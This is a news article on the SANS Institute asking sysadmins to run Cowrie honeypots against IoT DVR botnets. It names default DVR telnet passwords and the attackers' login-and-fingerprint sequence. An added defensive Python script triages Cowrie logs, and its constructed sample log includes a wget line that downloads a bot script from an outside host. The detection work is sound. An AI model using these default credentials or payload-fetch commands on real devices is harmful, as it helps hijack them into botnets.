SANS issues call to arms to battle IoT botnets

Solarquest

The SANS Institute is hoping sysadmins can help it do what vendors won't: improve Internet of Things security.

The call comes in the wake of not one but two IoT-based botnet attacks: the 600 Gbps-plus slam that drove security publication Krebs on Security from Akamai to Google's Project Shield, and the same botnet escalating to nearly 1 Tbps in an attack on French hosting provider OVH. SANS wants suitably skilled sysadmins to lay out the honey.


In its analysis, SANS asks that people "Consider running the latest version of cowrie on a honeypot to help us keep an eye on the passwords attempted to look for any shifts in the current pattern."

The analysis focuses on digital video recorders (DVRs) that have either never been patched to remove their old default telnet credentials, or come from manufacturers that haven't bothered patching that kind of hole at all.

SANS's Johannes Ullrich, PhD, writes that his honeypot setup sees large numbers of scans testing default passwords such as xc3511 (the default for a generic Chinese DVR, the DH-3004, since patched) and 7ujMko0 (a string some DVRs add to their default web password).

Ullrich's own DVR honeypot, once connected to the Internet, was hit with so many telnet attempts that it had to be rebooted regularly.

The attempted attacks followed a predictable pattern:

  • Try to log in using the default credentials;
  • Try to detect if a honeypot is attached;
  • Fingerprint the target to work out its CPU and partition list;
  • Check if the disk is writable from telnet;
  • Test wget and tftp; and
  • See if the target will build binaries.
If the target passes these tests, the attacker loads the bot software onto it, and the newly infected device starts scanning for more vulnerable hosts (at a rate of more than 100 connections per second).
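The two things SANS is asking honeypot operators to watch for (which credentials are being tried, and whether sessions still follow the login / honeypot-check / fingerprint / writable-disk / wget-tftp / build-test sequence above) can be pulled straight out of Cowrie's JSON log. The following triage script is an added example written for this page, not code from the SANS post, The Register, or the Cowrie project. It assumes Cowrie's JSON-lines log format (`eventid`, `session`, `username`, `password`, `input` fields); the per-stage command regexes are illustrative heuristics chosen here, the treatment of 7ujMko0 as a password prefix follows the post's description rather than a published list, and the sample log lines are constructed.

```python
"""Triage Cowrie JSON-lines logs for the DVR-botnet pattern described above.

Added example, not from the SANS post or The Register article. It assumes
Cowrie's JSON log format (eventid, session, username, password, input
fields); the stage regexes and sample log lines are constructed here.
"""
import json
import re
from collections import Counter, defaultdict

# Passwords named in the SANS analysis: the generic-DVR default "xc3511" and
# the "7ujMko0" string some DVRs prepend to their default web password
# (treated here as a prefix, an assumption based on the post's wording).
DVR_DEFAULT_PASSWORDS = ("xc3511",)
DVR_DEFAULT_PREFIXES = ("7ujMko0",)

# Assumed command signatures for the post-login stages listed in the post.
# These regexes are heuristics written for this example, not indicators
# published by SANS.
STAGE_PATTERNS = [
    ("honeypot_check", re.compile(r"/bin/busybox\s+[A-Z]{3,8}\b")),
    ("fingerprint", re.compile(r"cat\s+/proc/(cpuinfo|mounts|partitions)")),
    ("writable_check", re.compile(r">\s*/(tmp|var|dev|mnt)\S*")),
    ("wget_tftp", re.compile(r"\b(wget|tftp)\b")),
    ("build_test", re.compile(r"\b(gcc|cc|make)\b")),
]
STAGE_NAMES = {name for name, _ in STAGE_PATTERNS}


def parse_cowrie(lines):
    """Yield one event dict per well-formed JSON line; skip blank or corrupt lines."""
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            yield json.loads(line)
        except json.JSONDecodeError:
            continue


def is_dvr_default(password):
    """True if the password is one of the DVR defaults called out in the analysis."""
    return password in DVR_DEFAULT_PASSWORDS or password.startswith(DVR_DEFAULT_PREFIXES)


def triage(lines, min_stages=3):
    """Return (credential tally, stages seen per session, sessions to flag).

    A session is flagged when at least `min_stages` of the post-login stages
    (honeypot check, fingerprint, writable check, wget/tftp, build test) occur.
    """
    creds = Counter()
    stages = defaultdict(set)
    for ev in parse_cowrie(lines):
        eid = ev.get("eventid", "")
        sid = ev.get("session", "?")
        if eid in ("cowrie.login.success", "cowrie.login.failed"):
            password = ev.get("password", "")
            creds[(ev.get("username", ""), password)] += 1
            if is_dvr_default(password):
                stages[sid].add("dvr_default_login")
        elif eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            for name, pattern in STAGE_PATTERNS:
                if pattern.search(cmd):
                    stages[sid].add(name)
    flagged = sorted(s for s, seen in stages.items() if len(seen & STAGE_NAMES) >= min_stages)
    return creds, dict(stages), flagged


# Constructed sample log: three sessions, one of which walks the full pattern.
SAMPLE_LOG = [
    '{"eventid":"cowrie.login.failed","session":"a1","src_ip":"198.51.100.7","username":"root","password":"admin"}',
    '{"eventid":"cowrie.login.success","session":"a1","src_ip":"198.51.100.7","username":"root","password":"xc3511"}',
    '{"eventid":"cowrie.command.input","session":"a1","input":"/bin/busybox ECCHI"}',
    '{"eventid":"cowrie.command.input","session":"a1","input":"cat /proc/cpuinfo"}',
    '{"eventid":"cowrie.command.input","session":"a1","input":"cat /proc/mounts"}',
    '{"eventid":"cowrie.command.input","session":"a1","input":"echo -e probe > /tmp/.probe"}',
    '{"eventid":"cowrie.command.input","session":"a1","input":"wget http://203.0.113.9/bot.sh -O /tmp/bot.sh"}',
    '{"eventid":"cowrie.login.failed","session":"b2","src_ip":"203.0.113.5","username":"admin","password":"7ujMko0admin"}',
    '{"eventid":"cowrie.login.failed","session":"c3","src_ip":"192.0.2.4","username":"root","password":"123456"}',
    "this line is corrupt and must be skipped",
]

if __name__ == "__main__":
    creds, stages, flagged = triage(SAMPLE_LOG)
    for (user, pw), n in creds.most_common():
        print(f"{n:4d}  {user}:{pw}  {'<- DVR default' if is_dvr_default(pw) else ''}")
    for sid in flagged:
        print(f"session {sid} walked stages: {sorted(stages[sid])}")
```

Run it against a real `cowrie.json` by replacing `SAMPLE_LOG` with the file's lines; the credential tally is what SANS wants eyes on (a new top password is the "shift in the current pattern"), and the per-session stage set separates scanners that only spray credentials from loaders that got a shell and ran the fingerprint sequence.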

Ullrich's post includes the bot software he observed.

So if you decide to run up a honeypot, that's what to expect. ®